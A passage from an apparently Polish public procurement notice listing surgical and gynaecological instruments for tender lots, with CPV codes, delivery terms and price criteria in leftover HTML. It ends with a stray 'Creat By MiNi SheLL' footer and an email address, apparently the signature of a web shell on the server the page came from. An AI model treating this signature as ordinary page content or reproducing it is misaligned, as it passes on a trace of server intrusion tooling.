7) Rozszerzacz maciczny Hegara pojedyn. 7mm 
8) Rozszerzacz maciczny Hegara pojedyn 8mm
9) Rozszerzacz maciczny Hegara pojedyn. 9mm
10) Rozszerzacz maciczny Hegara pojed. 1.5mm
11) Rozszerzacz maciczny Hegara pojed. 2.5mm
12) Rozszerzacz maciczny Hegara pojed. 3.5mm
13) Rozszerzacz maciczny Hegara pojed. 4.5mm
14) Rozszerzacz maciczny Hegara pojed. 5.5mm
15) Rozszerzacz maciczny Hegara pojed. 6.5
16) Rozszerzacz maciczny Hegara pojed. 7.5
17) Rozszerzacz maciczny Hegara pojed. 8.5
18) Rozszerzacz maciczny Hegara pojed. 9.5
19) Szczypce opatrunkowe typu. Maier bez zamka ,proste dł. 265mm
20) Zcisk opatrunkowy typu. Backhaus 110mm
21) Zestaw st.wzierników pochw typu. Kallmorgen 95x39mm dł. 200mm
22) Kleszcze naczyniowe typu. Rochester-pean proste dł. 240mm
23) Sonda maciczna typu. Sims wyskalow.śr.4  dł. 330mm
24) Szczypce atraumatyczne,aumatyczne typu. Foerster ząbkowane, proste dł. 240mm
25) Łyżeczka maciczna typu. Recamier ostra fig. 00 4,5mm
26) Łyżeczka maciczna typu. Recamier ostra fig. 00 7.5mm
27) Łyżeczka maciczna Sims fog   1 ostra
28) Kulociąg typu. Schroeder dł 250mm
29) Szczypce typu. Cushing 2x20mm dł 180mm
30) Kulociąg typu. Schroeder 2x2 zęby prosty dł 250mm
31) Kontener pracujący w systemie otwartym składającym się z: Wanna Kontenera o wymiarach 300 x 274 x 120 mm, aluminiowy, pokrywa ze sztucznego polimeru z filtrami na ok. 5000 cykli sterylizacji, przeźroczysta, kosz na narzędzia o wymiarach 243 x 253 x 106mm perforowany wykonany z jednego arkusza blachy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.90.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET NR 6 - Inne narzędzia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Kleszcze atraumatyczne,naczyniowe typu. De bakey-pean dł. 260mm zakrzywione
2) Hak brzuszny typu Balfour 270 200mm
3) Hak brzuszny typu Balfour 170 200mm
4) Pudełko na igły z pudel.wew.sr.95x16mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.90.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com